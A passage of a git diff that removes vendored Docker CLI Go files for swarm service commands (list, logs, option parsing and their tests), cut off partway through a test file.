"github.com/docker/docker/pkg/testutil/assert" -) - -func formatServiceInspect(t *testing.T, format formatter.Format, now time.Time) string { - b := new(bytes.Buffer) - - endpointSpec := &swarm.EndpointSpec{ - Mode: "vip", - Ports: []swarm.PortConfig{ - { - Protocol: swarm.PortConfigProtocolTCP, - TargetPort: 5000, - }, - }, - } - - two := uint64(2) - - s := swarm.Service{ - ID: "de179gar9d0o7ltdybungplod", - Meta: swarm.Meta{ - Version: swarm.Version{Index: 315}, - CreatedAt: now, - UpdatedAt: now, - }, - Spec: swarm.ServiceSpec{ - Annotations: swarm.Annotations{ - Name: "my_service", - Labels: map[string]string{"com.label": "foo"}, - }, - TaskTemplate: swarm.TaskSpec{ - ContainerSpec: swarm.ContainerSpec{ - Image: "foo/bar@sha256:this_is_a_test", - }, - }, - Mode: swarm.ServiceMode{ - Replicated: &swarm.ReplicatedService{ - Replicas: &two, - }, - }, - UpdateConfig: nil, - Networks: []swarm.NetworkAttachmentConfig{ - { - Target: "5vpyomhb6ievnk0i0o60gcnei", - Aliases: []string{"web"}, - }, - }, - EndpointSpec: endpointSpec, - }, - Endpoint: swarm.Endpoint{ - Spec: *endpointSpec, - Ports: []swarm.PortConfig{ - { - Protocol: swarm.PortConfigProtocolTCP, - TargetPort: 5000, - PublishedPort: 30000, - }, - }, - VirtualIPs: []swarm.EndpointVirtualIP{ - { - NetworkID: "6o4107cj2jx9tihgb0jyts6pj", - Addr: "10.255.0.4/16", - }, - }, - }, - UpdateStatus: swarm.UpdateStatus{ - StartedAt: now, - CompletedAt: now, - }, - } - - ctx := formatter.Context{ - Output: b, - Format: format, - } - - err := formatter.ServiceInspectWrite(ctx, []string{"de179gar9d0o7ltdybungplod"}, func(ref string) (interface{}, []byte, error) { - return s, nil, nil - }) - if err != nil { - t.Fatal(err) - } - return b.String() -} - -func TestPrettyPrintWithNoUpdateConfig(t *testing.T) { - s := formatServiceInspect(t, formatter.NewServiceFormat("pretty"), time.Now()) - if strings.Contains(s, "UpdateStatus") { - t.Fatal("Pretty print failed before parsing UpdateStatus") - } -} - -func TestJSONFormatWithNoUpdateConfig(t *testing.T) { - now := time.Now() - // s1: [{"ID":..}] - // s2: {"ID":..} - s1 := formatServiceInspect(t, formatter.NewServiceFormat(""), now) - t.Log("// s1") - t.Logf("%s", s1) - s2 := formatServiceInspect(t, formatter.NewServiceFormat("{{json .}}"), now) - t.Log("// s2") - t.Logf("%s", s2) - var m1Wrap []map[string]interface{} - if err := json.Unmarshal([]byte(s1), &m1Wrap); err != nil { - t.Fatal(err) - } - if len(m1Wrap) != 1 { - t.Fatalf("strange s1=%s", s1) - } - m1 := m1Wrap[0] - t.Logf("m1=%+v", m1) - var m2 map[string]interface{} - if err := json.Unmarshal([]byte(s2), &m2); err != nil { - t.Fatal(err) - } - t.Logf("m2=%+v", m2) - assert.DeepEqual(t, m2, m1) -} diff --git a/vendor/github.com/docker/docker/cli/command/service/list.go b/vendor/github.com/docker/docker/cli/command/service/list.go deleted file mode 100644 index 724126079c..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/list.go +++ /dev/null @@ -1,158 +0,0 @@ -package service - -import ( - "fmt" - "io" - "text/tabwriter" - - distreference "github.com/docker/distribution/reference" - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/stringid" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -const ( - listItemFmt = "%s\t%s\t%s\t%s\t%s\n" -) - -type listOptions struct { - quiet bool - filter opts.FilterOpt -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := listOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ls [OPTIONS]", - Aliases: []string{"list"}, - Short: "List services", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runList(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func runList(dockerCli *command.DockerCli, opts listOptions) error { - ctx := context.Background() - client := dockerCli.Client() - out := dockerCli.Out() - - services, err := client.ServiceList(ctx, types.ServiceListOptions{Filters: opts.filter.Value()}) - if err != nil { - return err - } - - if len(services) > 0 && !opts.quiet { - // only non-empty services and not quiet, should we call TaskList and NodeList api - taskFilter := filters.NewArgs() - for _, service := range services { - taskFilter.Add("service", service.ID) - } - - tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: taskFilter}) - if err != nil { - return err - } - - nodes, err := client.NodeList(ctx, types.NodeListOptions{}) - if err != nil { - return err - } - - PrintNotQuiet(out, services, nodes, tasks) - } else if !opts.quiet { - // no services and not quiet, print only one line with columns ID, NAME, MODE, REPLICAS... - PrintNotQuiet(out, services, []swarm.Node{}, []swarm.Task{}) - } else { - PrintQuiet(out, services) - } - - return nil -} - -// PrintNotQuiet shows service list in a non-quiet way. -// Besides this, command `docker stack services xxx` will call this, too. -func PrintNotQuiet(out io.Writer, services []swarm.Service, nodes []swarm.Node, tasks []swarm.Task) { - activeNodes := make(map[string]struct{}) - for _, n := range nodes { - if n.Status.State != swarm.NodeStateDown { - activeNodes[n.ID] = struct{}{} - } - } - - running := map[string]int{} - tasksNoShutdown := map[string]int{} - - for _, task := range tasks { - if task.DesiredState != swarm.TaskStateShutdown { - tasksNoShutdown[task.ServiceID]++ - } - - if _, nodeActive := activeNodes[task.NodeID]; nodeActive && task.Status.State == swarm.TaskStateRunning { - running[task.ServiceID]++ - } - } - - printTable(out, services, running, tasksNoShutdown) -} - -func printTable(out io.Writer, services []swarm.Service, running, tasksNoShutdown map[string]int) { - writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0) - - // Ignore flushing errors - defer writer.Flush() - - fmt.Fprintf(writer, listItemFmt, "ID", "NAME", "MODE", "REPLICAS", "IMAGE") - - for _, service := range services { - mode := "" - replicas := "" - if service.Spec.Mode.Replicated != nil && service.Spec.Mode.Replicated.Replicas != nil { - mode = "replicated" - replicas = fmt.Sprintf("%d/%d", running[service.ID], *service.Spec.Mode.Replicated.Replicas) - } else if service.Spec.Mode.Global != nil { - mode = "global" - replicas = fmt.Sprintf("%d/%d", running[service.ID], tasksNoShutdown[service.ID]) - } - image := service.Spec.TaskTemplate.ContainerSpec.Image - ref, err := distreference.ParseNamed(image) - if err == nil { - // update image string for display - namedTagged, ok := ref.(distreference.NamedTagged) - if ok { - image = namedTagged.Name() + ":" + namedTagged.Tag() - } - } - - fmt.Fprintf( - writer, - listItemFmt, - stringid.TruncateID(service.ID), - service.Spec.Name, - mode, - replicas, - image) - } -} - -// PrintQuiet shows service list in a quiet way. -// Besides this, command `docker stack services xxx` will call this, too. -func PrintQuiet(out io.Writer, services []swarm.Service) { - for _, service := range services { - fmt.Fprintln(out, service.ID) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/service/logs.go b/vendor/github.com/docker/docker/cli/command/service/logs.go deleted file mode 100644 index 19d3d9a488..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/logs.go +++ /dev/null @@ -1,163 +0,0 @@ -package service - -import ( - "bytes" - "fmt" - "io" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/idresolver" - "github.com/docker/docker/pkg/stdcopy" - "github.com/spf13/cobra" -) - -type logsOptions struct { - noResolve bool - follow bool - since string - timestamps bool - details bool - tail string - - service string -} - -func newLogsCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts logsOptions - - cmd := &cobra.Command{ - Use: "logs [OPTIONS] SERVICE", - Short: "Fetch the logs of a service", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.service = args[0] - return runLogs(dockerCli, &opts) - }, - Tags: map[string]string{"experimental": ""}, - } - - flags := cmd.Flags() - flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") - flags.BoolVarP(&opts.follow, "follow", "f", false, "Follow log output") - flags.StringVar(&opts.since, "since", "", "Show logs since timestamp") - flags.BoolVarP(&opts.timestamps, "timestamps", "t", false, "Show timestamps") - flags.BoolVar(&opts.details, "details", false, "Show extra details provided to logs") - flags.StringVar(&opts.tail, "tail", "all", "Number of lines to show from the end of the logs") - return cmd -} - -func runLogs(dockerCli *command.DockerCli, opts *logsOptions) error { - ctx := context.Background() - - options := types.ContainerLogsOptions{ - ShowStdout: true, - ShowStderr: true, - Since: opts.since, - Timestamps: opts.timestamps, - Follow: opts.follow, - Tail: opts.tail, - Details: opts.details, - } - - client := dockerCli.Client() - responseBody, err := client.ServiceLogs(ctx, opts.service, options) - if err != nil { - return err - } - defer responseBody.Close() - - resolver := idresolver.New(client, opts.noResolve) - - stdout := &logWriter{ctx: ctx, opts: opts, r: resolver, w: dockerCli.Out()} - stderr := &logWriter{ctx: ctx, opts: opts, r: resolver, w: dockerCli.Err()} - - // TODO(aluzzardi): Do an io.Copy for services with TTY enabled. - _, err = stdcopy.StdCopy(stdout, stderr, responseBody) - return err -} - -type logWriter struct { - ctx context.Context - opts *logsOptions - r *idresolver.IDResolver - w io.Writer -} - -func (lw *logWriter) Write(buf []byte) (int, error) { - contextIndex := 0 - numParts := 2 - if lw.opts.timestamps { - contextIndex++ - numParts++ - } - - parts := bytes.SplitN(buf, []byte(" "), numParts) - if len(parts) != numParts { - return 0, fmt.Errorf("invalid context in log message: %v", string(buf)) - } - - taskName, nodeName, err := lw.parseContext(string(parts[contextIndex])) - if err != nil { - return 0, err - } - - output := []byte{} - for i, part := range parts { - // First part doesn't get space separation. - if i > 0 { - output = append(output, []byte(" ")...) - } - - if i == contextIndex { - // TODO(aluzzardi): Consider constant padding. - output = append(output, []byte(fmt.Sprintf("%s@%s |", taskName, nodeName))...) - } else { - output = append(output, part...) - } - } - _, err = lw.w.Write(output) - if err != nil { - return 0, err - } - - return len(buf), nil -} - -func (lw *logWriter) parseContext(input string) (string, string, error) { - context := make(map[string]string) - - components := strings.Split(input, ",") - for _, component := range components { - parts := strings.SplitN(component, "=", 2) - if len(parts) != 2 { - return "", "", fmt.Errorf("invalid context: %s", input) - } - context[parts[0]] = parts[1] - } - - taskID, ok := context["com.docker.swarm.task.id"] - if !ok { - return "", "", fmt.Errorf("missing task id in context: %s", input) - } - taskName, err := lw.r.Resolve(lw.ctx, swarm.Task{}, taskID) - if err != nil { - return "", "", err - } - - nodeID, ok := context["com.docker.swarm.node.id"] - if !ok { - return "", "", fmt.Errorf("missing node id in context: %s", input) - } - nodeName, err := lw.r.Resolve(lw.ctx, swarm.Node{}, nodeID) - if err != nil { - return "", "", err - } - - return taskName, nodeName, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/service/opts.go b/vendor/github.com/docker/docker/cli/command/service/opts.go deleted file mode 100644 index cbe544aacc..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/opts.go +++ /dev/null @@ -1,648 +0,0 @@ -package service - -import ( - "encoding/csv" - "fmt" - "os" - "path/filepath" - "strconv" - "strings" - "time" - - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/docker/go-connections/nat" - units "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type int64Value interface { - Value() int64 -} - -type memBytes int64 - -func (m *memBytes) String() string { - return units.BytesSize(float64(m.Value())) -} - -func (m *memBytes) Set(value string) error { - val, err := units.RAMInBytes(value) - *m = memBytes(val) - return err -} - -func (m *memBytes) Type() string { - return "bytes" -} - -func (m *memBytes) Value() int64 { - return int64(*m) -} - -// PositiveDurationOpt is an option type for time.Duration that uses a pointer. -// It bahave similarly to DurationOpt but only allows positive duration values. -type PositiveDurationOpt struct { - DurationOpt -} - -// Set a new value on the option. Setting a negative duration value will cause -// an error to be returned. -func (d *PositiveDurationOpt) Set(s string) error { - err := d.DurationOpt.Set(s) - if err != nil { - return err - } - if *d.DurationOpt.value < 0 { - return fmt.Errorf("duration cannot be negative") - } - return nil -} - -// DurationOpt is an option type for time.Duration that uses a pointer. This -// allows us to get nil values outside, instead of defaulting to 0 -type DurationOpt struct { - value *time.Duration -} - -// Set a new value on the option -func (d *DurationOpt) Set(s string) error { - v, err := time.ParseDuration(s) - d.value = &v - return err -} - -// Type returns the type of this option, which will be displayed in `--help` output -func (d *DurationOpt) Type() string { - return "duration" -} - -// String returns a string repr of this option -func (d *DurationOpt) String() string { - if d.value != nil { - return d.value.String() - } - return "" -} - -// Value returns the time.Duration -func (d *DurationOpt) Value() *time.Duration { - return d.value -} - -// Uint64Opt represents a uint64. -type Uint64Opt struct { - value *uint64 -} - -// Set a new value on the option -func (i *Uint64Opt) Set(s string) error { - v, err := strconv.ParseUint(s, 0, 64) - i.value = &v - return err -} - -// Type returns the type of this option, which will be displayed in `--help` output -func (i *Uint64Opt) Type() string { - return "uint" -} - -// String returns a string repr of this option -func (i *Uint64Opt) String() string { - if i.value != nil { - return fmt.Sprintf("%v", *i.value) - } - return "" -} - -// Value returns the uint64 -func (i *Uint64Opt) Value() *uint64 { - return i.value -} - -type floatValue float32 - -func (f *floatValue) Set(s string) error { - v, err := strconv.ParseFloat(s, 32) - *f = floatValue(v) - return err -} - -func (f *floatValue) Type() string { - return "float" -} - -func (f *floatValue) String() string { - return strconv.FormatFloat(float64(*f), 'g', -1, 32) -} - -func (f *floatValue) Value() float32 { - return float32(*f) -} - -// SecretRequestSpec is a type for requesting secrets -type SecretRequestSpec struct { - source string - target string - uid string - gid string - mode os.FileMode -} - -// SecretOpt is a Value type for parsing secrets -type SecretOpt struct { - values []*SecretRequestSpec -} - -// Set a new secret value -func (o *SecretOpt) Set(value string) error { - csvReader := csv.NewReader(strings.NewReader(value)) - fields, err := csvReader.Read() - if err != nil { - return err - } - - spec := &SecretRequestSpec{ - source: "", - target: "", - uid: "0", - gid: "0", - mode: 0444, - } - - for _, field := range fields { - parts := strings.SplitN(field, "=", 2) - key := strings.ToLower(parts[0]) - - if len(parts) != 2 { - return fmt.Errorf("invalid field '%s' must be a key=value pair", field) - } - - value := parts[1] - switch key { - case "source", "src": - spec.source = value - case "target": - tDir, _ := filepath.Split(value) - if tDir != "" { - return fmt.Errorf("target must not have a path") - } - spec.target = value - case "uid": - spec.uid = value - case "gid": - spec.gid = value - case "mode": - m, err := strconv.ParseUint(value, 0, 32) - if err != nil { - return fmt.Errorf("invalid mode specified: %v", err) - } - - spec.mode = os.FileMode(m) - default: - return fmt.Errorf("invalid field in secret request: %s", key) - } - } - - if spec.source == "" { - return fmt.Errorf("source is required") - } - - o.values = append(o.values, spec) - return nil -} - -// Type returns the type of this option -func (o *SecretOpt) Type() string { - return "secret" -} - -// String returns a string repr of this option -func (o *SecretOpt) String() string { - secrets := []string{} - for _, secret := range o.values { - repr := fmt.Sprintf("%s -> %s", secret.source, secret.target) - secrets = append(secrets, repr) - } - return strings.Join(secrets, ", ") -} - -// Value returns the secret requests -func (o *SecretOpt) Value() []*SecretRequestSpec { - return o.values -} - -type updateOptions struct { - parallelism uint64 - delay time.Duration - monitor time.Duration - onFailure string - maxFailureRatio floatValue -} - -type resourceOptions struct { - limitCPU opts.NanoCPUs - limitMemBytes memBytes - resCPU opts.NanoCPUs - resMemBytes memBytes -} - -func (r *resourceOptions) ToResourceRequirements() *swarm.ResourceRequirements { - return &swarm.ResourceRequirements{ - Limits: &swarm.Resources{ - NanoCPUs: r.limitCPU.Value(), - MemoryBytes: r.limitMemBytes.Value(), - }, - Reservations: &swarm.Resources{ - NanoCPUs: r.resCPU.Value(), - MemoryBytes: r.resMemBytes.Value(), - }, - } -} - -type restartPolicyOptions struct { - condition string - delay DurationOpt - maxAttempts Uint64Opt - window DurationOpt -} - -func (r *restartPolicyOptions) ToRestartPolicy() *swarm.RestartPolicy { - return &swarm.RestartPolicy{ - Condition: swarm.RestartPolicyCondition(r.condition), - Delay: r.delay.Value(), - MaxAttempts: r.maxAttempts.Value(), - Window: r.window.Value(), - } -} - -func convertNetworks(networks []string) []swarm.NetworkAttachmentConfig { - nets := []swarm.NetworkAttachmentConfig{} - for _, network := range networks { - nets = append(nets, swarm.NetworkAttachmentConfig{Target: network}) - } - return nets -} - -type endpointOptions struct { - mode string - publishPorts opts.PortOpt -} - -func (e *endpointOptions) ToEndpointSpec() *swarm.EndpointSpec { - return &swarm.EndpointSpec{ - Mode: swarm.ResolutionMode(strings.ToLower(e.mode)), - Ports: e.publishPorts.Value(), - } -} - -type logDriverOptions struct { - name string - opts opts.ListOpts -} - -func newLogDriverOptions() logDriverOptions { - return logDriverOptions{opts: opts.NewListOpts(runconfigopts.ValidateEnv)} -} - -func (ldo *logDriverOptions) toLogDriver() *swarm.Driver { - if ldo.name == "" { - return nil - } - - // set the log driver only if specified. - return &swarm.Driver{ - Name: ldo.name, - Options: runconfigopts.ConvertKVStringsToMap(ldo.opts.GetAll()), - } -} - -type healthCheckOptions struct { - cmd string - interval PositiveDurationOpt - timeout PositiveDurationOpt - retries int - noHealthcheck bool -} - -func (opts *healthCheckOptions) toHealthConfig() (*container.HealthConfig, error) { - var healthConfig *container.HealthConfig - haveHealthSettings := opts.cmd != "" || - opts.interval.Value() != nil || - opts.timeout.Value() != nil || - opts.retries != 0 - if opts.noHealthcheck { - if haveHealthSettings { - return nil, fmt.Errorf("--%s conflicts with --health-* options", flagNoHealthcheck) - } - healthConfig = &container.HealthConfig{Test: []string{"NONE"}} - } else if haveHealthSettings { - var test []string - if opts.cmd != "" { - test = []string{"CMD-SHELL", opts.cmd} - } - var interval, timeout time.Duration - if ptr := opts.interval.Value(); ptr != nil { - interval = *ptr - } - if ptr := opts.timeout.Value(); ptr != nil { - timeout = *ptr - } - healthConfig = &container.HealthConfig{ - Test: test, - Interval: interval, - Timeout: timeout, - Retries: opts.retries, - } - } - return healthConfig, nil -} - -// ValidatePort validates a string is in the expected format for a port definition -func ValidatePort(value string) (string, error) { - portMappings, err := nat.ParsePortSpec(value) - for _, portMapping := range portMappings { - if portMapping.Binding.HostIP != "" { - return "", fmt.Errorf("HostIP is not supported by a service.") - } - } - return value, err -} - -// convertExtraHostsToSwarmHosts converts an array of extra hosts in cli -// : -// into a swarmkit host format: -// IP_address canonical_hostname [aliases...] -// This assumes input value (:) has already been validated -func convertExtraHostsToSwarmHosts(extraHosts []string) []string { - hosts := []string{} - for _, extraHost := range extraHosts { - parts := strings.SplitN(extraHost, ":", 2) - hosts = append(hosts, fmt.Sprintf("%s %s", parts[1], parts[0])) - } - return hosts -} - -type serviceOptions struct { - name string - labels opts.ListOpts - containerLabels opts.ListOpts - image string - args []string - hostname string - env opts.ListOpts - envFile opts.ListOpts - workdir string - user string - groups opts.ListOpts - tty bool - mounts opts.MountOpt - dns opts.ListOpts - dnsSearch opts.ListOpts - dnsOption opts.ListOpts - hosts opts.ListOpts - - resources resourceOptions - stopGrace DurationOpt - - replicas Uint64Opt - mode string - - restartPolicy restartPolicyOptions - constraints opts.ListOpts - update updateOptions - networks opts.ListOpts - endpoint endpointOptions - - registryAuth bool - - logDriver logDriverOptions - - healthcheck healthCheckOptions - secrets opts.SecretOpt -} - -func newServiceOptions() *serviceOptions { - return &serviceOptions{ - labels: opts.NewListOpts(runconfigopts.ValidateEnv), - constraints: opts.NewListOpts(nil), - containerLabels: opts.NewListOpts(runconfigopts.ValidateEnv), - env: opts.NewListOpts(runconfigopts.ValidateEnv), - envFile: opts.NewListOpts(nil), - groups: opts.NewListOpts(nil), - logDriver: newLogDriverOptions(), - dns: opts.NewListOpts(opts.ValidateIPAddress), - dnsOption: opts.NewListOpts(nil), - dnsSearch: opts.NewListOpts(opts.ValidateDNSSearch), - hosts: opts.NewListOpts(runconfigopts.ValidateExtraHost), - networks: opts.NewListOpts(nil), - } -} - -func (opts *serviceOptions) ToService() (swarm.ServiceSpec, error) { - var service swarm.ServiceSpec - - envVariables, err := runconfigopts.ReadKVStrings(opts.envFile.GetAll(), opts.env.GetAll()) - if err != nil { - return service, err - } - - currentEnv := make([]string, 0, len(envVariables)) - for _, env := range envVariables { // need to process each var, in order - k := strings.SplitN(env, "=", 2)[0] - for i, current := range currentEnv { // remove duplicates - if current == env { - continue // no update required, may hide this behind flag to preserve order of envVariables - } - if strings.HasPrefix(current, k+"=") { - currentEnv = append(currentEnv[:i], currentEnv[i+1:]...) - } - } - currentEnv = append(currentEnv, env) - } - - service = swarm.ServiceSpec{ - Annotations: swarm.Annotations{ - Name: opts.name, - Labels: runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()), - }, - TaskTemplate: swarm.TaskSpec{ - ContainerSpec: swarm.ContainerSpec{ - Image: opts.image, - Args: opts.args, - Env: currentEnv, - Hostname: opts.hostname, - Labels: runconfigopts.ConvertKVStringsToMap(opts.containerLabels.GetAll()), - Dir: opts.workdir, - User: opts.user, - Groups: opts.groups.GetAll(), - TTY: opts.tty, - Mounts: opts.mounts.Value(), - DNSConfig: &swarm.DNSConfig{ - Nameservers: opts.dns.GetAll(), - Search: opts.dnsSearch.GetAll(), - Options: opts.dnsOption.GetAll(), - }, - Hosts: convertExtraHostsToSwarmHosts(opts.hosts.GetAll()), - StopGracePeriod: opts.stopGrace.Value(), - Secrets: nil, - }, - Networks: convertNetworks(opts.networks.GetAll()), - Resources: opts.resources.ToResourceRequirements(), - RestartPolicy: opts.restartPolicy.ToRestartPolicy(), - Placement: &swarm.Placement{ - Constraints: opts.constraints.GetAll(), - }, - LogDriver: opts.logDriver.toLogDriver(), - }, - Networks: convertNetworks(opts.networks.GetAll()), - Mode: swarm.ServiceMode{}, - UpdateConfig: &swarm.UpdateConfig{ - Parallelism: opts.update.parallelism, - Delay: opts.update.delay, - Monitor: opts.update.monitor, - FailureAction: opts.update.onFailure, - MaxFailureRatio: opts.update.maxFailureRatio.Value(), - }, - EndpointSpec: opts.endpoint.ToEndpointSpec(), - } - - healthConfig, err := opts.healthcheck.toHealthConfig() - if err != nil { - return service, err - } - service.TaskTemplate.ContainerSpec.Healthcheck = healthConfig - - switch opts.mode { - case "global": - if opts.replicas.Value() != nil { - return service, fmt.Errorf("replicas can only be used with replicated mode") - } - - service.Mode.Global = &swarm.GlobalService{} - case "replicated": - service.Mode.Replicated = &swarm.ReplicatedService{ - Replicas: opts.replicas.Value(), - } - default: - return service, fmt.Errorf("Unknown mode: %s", opts.mode) - } - return service, nil -} - -// addServiceFlags adds all flags that are common to both `create` and `update`. -// Any flags that are not common are added separately in the individual command -func addServiceFlags(cmd *cobra.Command, opts *serviceOptions) { - flags := cmd.Flags() - - flags.StringVarP(&opts.workdir, flagWorkdir, "w", "", "Working directory inside the container") - flags.StringVarP(&opts.user, flagUser, "u", "", "Username or UID (format: [:])") - flags.StringVar(&opts.hostname, flagHostname, "", "Container hostname") - - flags.Var(&opts.resources.limitCPU, flagLimitCPU, "Limit CPUs") - flags.Var(&opts.resources.limitMemBytes, flagLimitMemory, "Limit Memory") - flags.Var(&opts.resources.resCPU, flagReserveCPU, "Reserve CPUs") - flags.Var(&opts.resources.resMemBytes, flagReserveMemory, "Reserve Memory") - flags.Var(&opts.stopGrace, flagStopGracePeriod, "Time to wait before force killing a container (ns|us|ms|s|m|h)") - - flags.Var(&opts.replicas, flagReplicas, "Number of tasks") - - flags.StringVar(&opts.restartPolicy.condition, flagRestartCondition, "", "Restart when condition is met (none, on-failure, or any)") - flags.Var(&opts.restartPolicy.delay, flagRestartDelay, "Delay between restart attempts (ns|us|ms|s|m|h)") - flags.Var(&opts.restartPolicy.maxAttempts, flagRestartMaxAttempts, "Maximum number of restarts before giving up") - flags.Var(&opts.restartPolicy.window, flagRestartWindow, "Window used to evaluate the restart policy (ns|us|ms|s|m|h)") - - flags.Uint64Var(&opts.update.parallelism, flagUpdateParallelism, 1, "Maximum number of tasks updated simultaneously (0 to update all at once)") - flags.DurationVar(&opts.update.delay, flagUpdateDelay, time.Duration(0), "Delay between updates (ns|us|ms|s|m|h) (default 0s)") - flags.DurationVar(&opts.update.monitor, flagUpdateMonitor, time.Duration(0), "Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s)") - flags.StringVar(&opts.update.onFailure, flagUpdateFailureAction, "pause", "Action on update failure (pause|continue)") - flags.Var(&opts.update.maxFailureRatio, flagUpdateMaxFailureRatio, "Failure rate to tolerate during an update") - - flags.StringVar(&opts.endpoint.mode, flagEndpointMode, "", "Endpoint mode (vip or dnsrr)") - - flags.BoolVar(&opts.registryAuth, flagRegistryAuth, false, "Send registry authentication details to swarm agents") - - flags.StringVar(&opts.logDriver.name, flagLogDriver, "", "Logging driver for service") - flags.Var(&opts.logDriver.opts, flagLogOpt, "Logging driver options") - - flags.StringVar(&opts.healthcheck.cmd, flagHealthCmd, "", "Command to run to check health") - flags.Var(&opts.healthcheck.interval, flagHealthInterval, "Time between running the check (ns|us|ms|s|m|h)") - flags.Var(&opts.healthcheck.timeout, flagHealthTimeout, "Maximum time to allow one check to run (ns|us|ms|s|m|h)") - flags.IntVar(&opts.healthcheck.retries, flagHealthRetries, 0, "Consecutive failures needed to report unhealthy") - flags.BoolVar(&opts.healthcheck.noHealthcheck, flagNoHealthcheck, false, "Disable any container-specified HEALTHCHECK") - - flags.BoolVarP(&opts.tty, flagTTY, "t", false, "Allocate a pseudo-TTY") -} - -const ( - flagConstraint = "constraint" - flagConstraintRemove = "constraint-rm" - flagConstraintAdd = "constraint-add" - flagContainerLabel = "container-label" - flagContainerLabelRemove = "container-label-rm" - flagContainerLabelAdd = "container-label-add" - flagDNS = "dns" - flagDNSRemove = "dns-rm" - flagDNSAdd = "dns-add" - flagDNSOption = "dns-option" - flagDNSOptionRemove = "dns-option-rm" - flagDNSOptionAdd = "dns-option-add" - flagDNSSearch = "dns-search" - flagDNSSearchRemove = "dns-search-rm" - flagDNSSearchAdd = "dns-search-add" - flagEndpointMode = "endpoint-mode" - flagHost = "host" - flagHostAdd = "host-add" - flagHostRemove = "host-rm" - flagHostname = "hostname" - flagEnv = "env" - flagEnvFile = "env-file" - flagEnvRemove = "env-rm" - flagEnvAdd = "env-add" - flagGroup = "group" - flagGroupAdd = "group-add" - flagGroupRemove = "group-rm" - flagLabel = "label" - flagLabelRemove = "label-rm" - flagLabelAdd = "label-add" - flagLimitCPU = "limit-cpu" - flagLimitMemory = "limit-memory" - flagMode = "mode" - flagMount = "mount" - flagMountRemove = "mount-rm" - flagMountAdd = "mount-add" - flagName = "name" - flagNetwork = "network" - flagPublish = "publish" - flagPublishRemove = "publish-rm" - flagPublishAdd = "publish-add" - flagReplicas = "replicas" - flagReserveCPU = "reserve-cpu" - flagReserveMemory = "reserve-memory" - flagRestartCondition = "restart-condition" - flagRestartDelay = "restart-delay" - flagRestartMaxAttempts = "restart-max-attempts" - flagRestartWindow = "restart-window" - flagStopGracePeriod = "stop-grace-period" - flagTTY = "tty" - flagUpdateDelay = "update-delay" - flagUpdateFailureAction = "update-failure-action" - flagUpdateMaxFailureRatio = "update-max-failure-ratio" - flagUpdateMonitor = "update-monitor" - flagUpdateParallelism = "update-parallelism" - flagUser = "user" - flagWorkdir = "workdir" - flagRegistryAuth = "with-registry-auth" - flagLogDriver = "log-driver" - flagLogOpt = "log-opt" - flagHealthCmd = "health-cmd" - flagHealthInterval = "health-interval" - flagHealthRetries = "health-retries" - flagHealthTimeout = "health-timeout" - flagNoHealthcheck = "no-healthcheck" - flagSecret = "secret" - flagSecretAdd = "secret-add" - flagSecretRemove = "secret-rm" -) diff --git a/vendor/github.com/docker/docker/cli/command/service/opts_test.go b/vendor/github.com/docker/docker/cli/command/service/opts_test.go deleted file mode 100644 index 78b956ad67..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/opts_test.go +++ /dev/null @@ -1,107 +0,0 @@ -package service - -import ( - "reflect" - "testing" - "time" - - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestMemBytesString(t *testing.T) { - var mem memBytes = 1048576 - assert.Equal(t, mem.String(), "1 MiB") -} - -func TestMemBytesSetAndValue(t *testing.T) { - var mem memBytes - assert.NilError(t, mem.Set("5kb")) - assert.Equal(t, mem.Value(), int64(5120)) -} - -func TestNanoCPUsString(t *testing.T) { - var cpus opts.NanoCPUs = 6100000000 - assert.Equal(t, cpus.String(), "6.100") -} - -func TestNanoCPUsSetAndValue(t *testing.T) { - var cpus opts.NanoCPUs - assert.NilError(t, cpus.Set("0.35")) - assert.Equal(t, cpus.Value(), int64(350000000)) -} - -func TestDurationOptString(t *testing.T) { - dur := time.Duration(300 * 10e8) - duration := DurationOpt{value: &dur} - assert.Equal(t, duration.String(), "5m0s") -} - -func TestDurationOptSetAndValue(t *testing.T) { - var duration DurationOpt - assert.NilError(t, duration.Set("300s")) - assert.Equal(t, *duration.Value(), time.Duration(300*10e8)) - assert.NilError(t, duration.Set("-300s")) - assert.Equal(t, *duration.Value(), time.Duration(-300*10e8)) -} - -func TestPositiveDurationOptSetAndValue(t *testing.T) { - var duration PositiveDurationOpt - assert.NilError(t, duration.Set("300s")) - assert.Equal(t, *duration.Value(), time.Duration(300*10e8)) - assert.Error(t, duration.Set("-300s"), "cannot be negative") -} - -func TestUint64OptString(t *testing.T) { - value := uint64(2345678) - opt := Uint64Opt{value: &value} - assert.Equal(t, opt.String(), "2345678") - - opt = Uint64Opt{} - assert.Equal(t, opt.String(), "") -} - -func TestUint64OptSetAndValue(t *testing.T) { - var opt Uint64Opt - assert.NilError(t, 